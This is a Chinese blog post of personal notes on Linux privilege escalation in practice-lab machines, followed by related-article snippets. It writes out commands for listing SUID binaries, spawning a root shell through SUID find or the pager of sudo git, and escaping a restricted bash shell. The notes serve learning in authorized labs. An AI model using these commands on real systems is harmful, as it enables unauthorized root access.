记录靶机渗透中用到的提权方法

最新推荐文章于 2024-05-13 00:20:19 发布
最新推荐文章于 2024-05-13 00:20:19 发布
阅读量5.5k 收藏 5
点赞数
分类专栏: 网安 文章标签: git web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yaphst/article/details/123499110
版权

1、find提权

(1)首先使用如下命令查看具有suid 权限的可执行二进制程序

find / -perm -4000 -type f 2>/dev/null
或
find / -perm -u=s -type f 2>/dev/null

参数含义参考find基础命令

-perm:按照文件权限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如777为普通文件的最高权限,7000为特殊文件的最高权限
-type:d(目录)f(文件)c(字符设备文件)b(块设备文件)

(2)若find命令在输出结果中,执行如下代码,提权

touch 123.txt
find 123.txt -exec "/bin/sh" \;

2、git提权

(1)首先sudo -l查看可以无需密码以root权限执行的命令
(2)若结果存在git命令,执行以下代码强制进入交互状态,让页面缓冲区无法显示全部信息 (放大字体或将窗口变窄)。

sudo git -p --help 
或
sudo git help config

(3)在末行命令模式输入!/bin/bash完成提权
在这里插入图片描述

3、rbash逃逸

BASH_CMDS[a]=/bin/sh;a
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

如图,代码执行完毕后已经可以切换目录了,说明rbash逃逸成功
在这里插入图片描述
后续持续更新。。。

一路1向北
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
crasher.tar(DC3靶机所需exp-2)
02-20
DC3靶机所需exp
靶机渗透】Escalate_Linux靶机渗透练习+12种方式
serendipity1130的博客
08-31 4109
注:这个靶机主要用来练习Linux,有超过12种的方法 1.主机发现:arp-scan -l,发现靶机ip为192.168.225.149,并进行访问 2.扫描端口,开启了80,22端口 nmap -n -p- -A 192.168.225.149 -o escalate.nmap 3.发现是默认的apache页面,那么爆破php后缀的路径,发现shell.php的页面,进行访问: dirb http://192.168.225.149 -X .php 4.示:
Linux升总结_linux
最新发布
2401_84969775的博客
05-13 292
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
DC-1靶机
qq_45070118的博客
09-15 883
主机发现 目标为192.168.10.194 端口56937,111,22,80开启 扫描端口服务 扫描主机下的目录 nmap用脚本扫描靶机的漏洞 发现存在cve-2014-3704 打开msf 搜索CVE-2014-3704 进入模块 设置目标ip和线程 查看 进攻 然后进入meterpreter,拿到wellshell ls ps 升 有的时候,你可能会发现自己的 ...
渗透靶机进行
weixin_48876267的博客
10-21 452
渗透靶机进行 1 获取靶机相关信息 nmap -sV 192.168.222.131 *** Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-20 03:09 EDT Nmap scan report for localhost (192.168.222.131) Host is up (0.000067s latency). Not shown: 997 closed ports PORT STATE SERVICE VERSION 21/
DC1-9靶机总结
问彡心的博客
09-27 1682
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
exploit.tar(DC3靶机所需exp-1)
02-20
39772.zip
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
DC-7靶机渗透测试 (GPG,drush,mkfifo,nc
single_g_l的博客
08-13 1186
找到上传路径Content—>Add content-->Basic page下,准备添加PHP代码反弹shell,但发现Drupal 8不支持PHP代码,需要安装插件,将php模块(https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz)导入(导入路径extend—>+Install new module),导入成功后在extend中添加模块。解锁之后,账号才成功登录。查看config文件,发现账号密码,尝试登录,发现报错,账号或密码不正确。...
FBI靶机流程分析
cXiaoLee的博客
02-28 192
find命令常用命令
墨痕诉清风的博客
06-07 1756
查看具有suid 限的可执行二进制程序 查找root限可写文件 其它用户也可以写 查找root限可写、可执行文件 其它用户也可以写、执行 查找当前用户可读文件 find 若find命令suid在输出结果中,执行如下代码,...
find基础命令与教程
热门推荐
weixin_44912169的博客
04-29 1万+
find基础命令与教程 find命令用来在指定目录下查找文件,若不指定目录则视为当前目录 find常用参数 语法:find [path…] [expression] path为查找路径,.为当前路径,/为根目录 expression即为参数 -name: 按文件名查找文件 -perm: 按照文件限来查找文件,4000,2000,1000为分别表示SUID,SGID,SBIT,如77...
find命令以及反弹shell复现
qq_40898302的博客
04-21 7709
关于linux系统的find命令复现
linux 总结_linux,2024年最新成功拿到offer
2301_76225325的博客
04-13 1002
SUID限只在程序执行过程中如何查找?(1)通过find可用于反弹shell需要注意的是,php反弹shell的这些方法都需要php关闭safe_mode这个选项,才可以使用exec函数。普通用户反弹带suid的find命令反弹-ip表示以特模式启动的一个交互式shell(2)cp利用openssl生成密码将/etc/passwd文件复制到当前目录,添加用户,并且添加密码上面添加了aaa用户,但是用户id为0,表示root限。
DC-2渗透笔记SUID-git
qq_74157343的博客
09-21 124
DC-2,wp
linux方法(不断更新)
qq_42430287的博客
04-13 579
1.suid 搜索符合条件的可以用来的: find / -perm -u=s -type f 2>/dev/null find / -user root -perm -4000 -exec ls -ldb {} \; find / -user root -perm -4000 -print 2>/dev/null 三种都可以 搜索可以的程序,一般有以下 : nmap vi...
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5897
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
windows靶机
09-12
Windows靶机是用于学习和实践Windows系统技术的虚拟机或实体机。它模拟了一个具有已知漏洞或弱点的Windows系统,让安全研究人员、渗透测试人员或学习者能够探索和实践攻击技术。 有一些常见的Windows靶机可供使用,比如: 1. Metasploitable:这是一个常用的漏洞测试靶机,其中包含了多个已知漏洞,包括Windows系统的一些弱点。 2. VulnHub:这是一个供多种漏洞靶机的平台,你可以在上面找到适合你学习和实践的Windows靶机。 3. HackTheBox:这是一个在线渗透测试实验平台,供了一系列具有各种漏洞和挑战的虚拟机。 请注意,在使用任何靶机之前,请确保你已经获得了合法的授,并遵守法律和道德准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值